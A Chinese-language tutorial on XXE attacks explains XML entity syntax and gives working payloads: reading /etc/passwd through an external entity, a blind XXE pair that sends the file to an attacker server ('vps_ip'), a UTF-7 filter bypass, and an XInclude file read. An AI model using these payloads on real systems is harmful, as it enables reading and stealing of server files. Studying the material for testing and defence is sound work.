利用XXE漏洞读取文件
参考文献两篇:
https://www.anquanke.com/post/id/155328
https://www.anquanke.com/post/id/156227
XEE语法:
XML声明
<?xml version="1.0" encoding="UTF-8"?>
encodeing是指使用的字符编码格式有UTF-8,GBK,gb2312等等,可用于bypass
XML实体
外部实体分SYSYTEM及PUBLIC两种:
SYSYTEM引用本地计算机,PUBLIC引用公共计算机,外部实体格式如下:
<!ENTITY 引用名 SYSTEM(PUBLIC) "URI地址">
DOCTYPE声明
在XML文档中,<!DOCTYPE[...]>声明跟在XML声明的后面。实体也必须在DOCTYPE声明中声明。
例如
<?xml version="1.0" unicode="UTF-8"?>
<!DOCTYPE[
在此声明实体<!ENTITY 实体引用名 "引用内容">
]>
实体引用
引用方式分为一般实体引用和参数实体引用。
一般实体引用: &实体引用名;
参数实体引用: %实体引用名;
完整格式
<?xml version="1.0" encoding="GBK"?>
<!DOCTYPE root[
<!ENTITY sky1 "引用字符1">
<!ENTITY sky2 "引用字符2">
]>
<root>
<title value="&sky1;"> &sky2; </title>
<title2>
<value><a>&sky2;</a></value>
</title2>
</root>
XEE安全隐患:
在解析Xml时,如果攻击者可以控制xml格式的文本内容,就可以让编译语言/脚本语言接收到恶意构造的参数,若不加过滤,则会引起安全隐患。
libxml2是用于解析xml的库,在2.6版本之前,默认允许引用外部实体(开启LIBXML_NOENT),可能导致xxe任意文件读取和BlindXXE文件读取攻击。
XXE任意文件读取
当xml解析内容有输出时,可以使用该攻击方法。
测试exp:
<?xml version = "1.0"?>
<!DOCTYPE ANY [
<!ENTITY f SYSTEM "file:///etc/passwd">
]>
<x>&f;</x>
此处将本地计算机中file:///etc/passwd文件的内容取出,赋值给了实体f
然后实体f的值作为元素x中的字符串数据被php解析的时候取出,作为对象里的内容
然后再输出该对象的时候被打印出来。
XXE任意文件盲读取
当XXE解析无输出时,尝试Blind XXE攻击:
1.我们可以利用file协议去读取本地文件
2.我们可以利用http协议让实体被带出
测试exp分为两部分:
post.xml
<?xml version="1.0"?>
<!DOCTYPE ANY[
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % remote SYSTEM "http://vps_ip/evil.xml">
%remote;
%all;
]>
<root>&send;</root>
evil.xml
<!ENTITY % all "<!ENTITY send SYSTEM 'http://vps_ip/1.php?file=%file;'>">
这样一来,在解析xml的时候:
1.file实体被赋予file:///etc/passwd的内容
2.解析remote值的时候,访问http://vps_ip/evil.xml
3.在解析evil.xml中all实体的时候,将file实体带入
4.访问指定url链接,将数据带出
于是成功造成了blind xxe文件读取
关键词过滤Bypass
例如,当ENTITY等被过滤,那么我们可以尝试使用utf-7等其他编码方式。
首先利用该网站
https://www.motobit.com/util/charset-codepage-conversion.asp
将payload
<!DOCTYPE ANY [
<!ENTITY f SYSTEM "file:///etc/passwd">
]>
<x>&f;</x>
转为utf-7,并在声明中指定utf-7编码
<?xml version="1.0" encoding="utf-7"?>
+ADwAIQ-DOCTYPE ANY +AFs-
+ADwAIQ-ENTITY f SYSTEM +ACI-file:///etc/passwd+ACIAPg-
+AF0APg-
+ADw-x+AD4AJg-f+ADsAPA-/x+AD4-
XXE文件包含
当libxml2版本高于2.6时,默认无法引用外部实体。可尝试XXE文件包含攻击。
<?xml version="1.0" ?>
<root xmlns:xi="http://www.w3.org/2001/XInclude">
<xi:include href="file:///etc/passwd" parse="text"/>
</root>
另外,xml用于数据存储时,将其当作是数据库,可能存在Xpath注入、Xpath盲注、代码注入等攻击方式。